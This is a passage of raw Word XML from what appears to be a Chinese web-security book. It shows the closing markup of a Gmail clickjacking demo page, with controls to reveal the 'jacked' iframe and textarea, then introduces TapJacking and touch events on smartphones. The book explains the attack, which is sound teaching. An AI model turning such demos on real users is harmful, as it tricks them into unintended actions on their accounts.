                    <w:ind w:left="506" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;br&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="506" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>mouth of the dolphin with the mouse.Make sure you have logged into GMAIL.</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="506" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;br&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="166" w:right="6831" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/center&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="21"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;br&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;br&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;div class="center"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="168" w:right="6608" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;center&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="667" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;center&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="28" w:right="3346" w:firstLine="796"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;input id="showHide_frame" type="checkbox" onclick="showHide_frame.call(this);"</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="986" w:right="4689" w:hanging="161"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;label for="showHide_frame"&gt; Show the jacked I--Frame</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/label&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>|</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;input id="showHide_text" type="checkbox"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-60"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>onclick="showHide_text.call(this);"</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="986" w:right="4785" w:hanging="161"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;label for="showHide_text"&gt; Show the jacked Textarea</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/label&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>|</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;input type=button value="Replay"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-60"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>onclick="location.reload();reload_text();"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="667" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/center&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="667" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;br&gt;&lt;br&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="168" w:right="6767" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;b&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Design by</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="986" w:right="2289" w:hanging="161"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;a target="_blank" </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId60">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>href="http://hi.baidu.com/xisigr</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>"&gt; xisigr</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="825" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/a&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="168" w:right="6671" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/b&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="21"/>
                    <w:ind w:left="168" w:right="6512" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/center&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/div&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="168" w:right="7342" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这是一个非常精彩的案例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="150" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>3.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>：触屏劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="301"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>到了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2010 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>年 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>月，智能手机上的“触屏劫持”攻击被斯坦福的安全研究者</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>公布，这意味着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>的攻击方式更进一步。安全研究者将这种触屏劫持称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>TapJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>以苹果公司的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iPhone </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>为代表，智能手机为人们提供了更先进的操控方式：触屏。从手机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="456" w:lineRule="auto" w:before="73"/>
        <w:ind w:left="603" w:right="466" w:hanging="401"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的角度来看，触屏实际上就是一个事件，手机 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>捕捉这些事件，并执行相应的动作。比如一次触屏操作，可能会对应以下几个事件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="255" w:lineRule="exact" w:before="0" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>touchstart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，手指触摸屏幕时发生；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3736;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,9.935001pt" to="158.16pt,9.935001pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark8" w:id="64"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>3 </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://seclab.stanford.edu/websec/framebusting/tapjacking.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="153" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>touchend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，手指离开屏幕时发生；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>touchmove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，手指滑动时发生；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>touchcancel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
